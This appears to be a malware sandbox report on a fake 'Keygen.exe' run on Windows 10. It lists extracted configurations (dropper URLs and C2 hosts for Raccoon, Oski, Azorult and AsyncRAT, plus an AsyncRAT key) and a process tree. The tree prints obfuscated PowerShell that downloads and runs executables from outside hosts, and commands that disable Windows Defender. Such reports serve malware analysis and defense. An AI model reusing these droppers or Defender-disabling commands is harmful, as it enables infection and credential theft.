Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

  • max time kernel
    83s
  • max time network
    1816s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 17:26

General

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes
  • url4cnc

    https://telete.in/brikitiki

rc4.plain
rc4.plain

Extracted

Family

oski

C2

taenaiaa.ac.ug

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

C2

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    agentttt.ac.ug,agentpurple.ac.ug

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6970

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 10 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Async RAT payload 3 IoCs
  • ModiLoader First Stage 2 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Keygen.exe
    "C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:8
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AA01.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3784
      • C:\Users\Admin\AppData\Local\Temp\AA01.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:3808
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:204
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Users\Public\sdj.exe
            "C:\Users\Public\sdj.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
              "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4464
              • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:400
            • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
              "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4744
              • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Checks processor information in registry
                PID:612
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 612 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\612802928901150\\* & exit
                  8⤵
                    PID:4280
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 612
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3900
              • C:\Users\Public\sdj.exe
                "C:\Users\Public\sdj.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:4012
                • C:\Users\Admin\AppData\Local\Temp\7vsmZmYwae.exe
                  "C:\Users\Admin\AppData\Local\Temp\7vsmZmYwae.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4784
                  • C:\Users\Admin\AppData\Local\Temp\7vsmZmYwae.exe
                    "C:\Users\Admin\AppData\Local\Temp\7vsmZmYwae.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1556
                • C:\Users\Admin\AppData\Local\Temp\f7uVYRTqmD.exe
                  "C:\Users\Admin\AppData\Local\Temp\f7uVYRTqmD.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:4912
                  • C:\Windows\SysWOW64\svchost.exe
                    "C:\Windows\System32\svchost.exe"
                    8⤵
                      PID:5408
                  • C:\Users\Admin\AppData\Local\Temp\ywqRvdP228.exe
                    "C:\Users\Admin\AppData\Local\Temp\ywqRvdP228.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4596
                    • C:\Users\Admin\AppData\Local\Temp\ywqRvdP228.exe
                      "C:\Users\Admin\AppData\Local\Temp\ywqRvdP228.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:2232
                      • \??\c:\windows\SysWOW64\cmstp.exe
                        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ov0hr2ow.inf
                        9⤵
                          PID:4348
                    • C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe
                      "C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4420
                      • C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe
                        "C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:4940
                      • C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe
                        "C:\Users\Admin\AppData\Local\Temp\TyaY0x0sZ4.exe"
                        8⤵
                        • Executes dropped EXE
                        • Windows security modification
                        PID:3548
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Get-MpPreference -verbose
                          9⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4772
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\sdj.exe"
                      7⤵
                        PID:4804
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:4352
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1996
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:416
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:2916
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4036
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2176
                  • C:\Users\Public\qar.exe
                    "C:\Users\Public\qar.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4200
                    • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                      "C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:4904
                    • C:\Users\Public\qar.exe
                      "{path}"
                      6⤵
                      • Executes dropped EXE
                      PID:4964
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:184
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4224
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                3⤵
                • Delays execution with timeout.exe
                PID:1512
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4404
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4520
                  • C:\Users\Public\upd.exe
                    "C:\Users\Public\upd.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:4584
                    • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                      "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2200
                      • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4100
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4616
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4712
          • C:\Windows\SysWOW64\DllHost.exe
            C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            1⤵
              PID:3992
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c start C:\Windows\temp\5dyaglhr.exe
                2⤵
                  PID:4196
                  • C:\Windows\temp\5dyaglhr.exe
                    C:\Windows\temp\5dyaglhr.exe
                    3⤵
                    • Executes dropped EXE
                    PID:4628
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3236
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4468
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:548
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2000
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4156
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4580
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4428
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1020
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1412
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4668
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:824
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3456
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4812
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /IM cmstp.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3916

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/356-846-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

                Filesize

                9.9MB

              • memory/400-147-0x0000000000400000-0x0000000000424000-memory.dmp

                Filesize

                144KB

              • memory/400-142-0x0000000000400000-0x0000000000424000-memory.dmp

                Filesize

                144KB

              • memory/416-15-0x000000006FE00000-0x00000000704EE000-memory.dmp

                Filesize

                6.9MB

              • memory/548-324-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

                Filesize

                9.9MB

              • memory/612-140-0x0000000000400000-0x0000000000438000-memory.dmp

                Filesize

                224KB

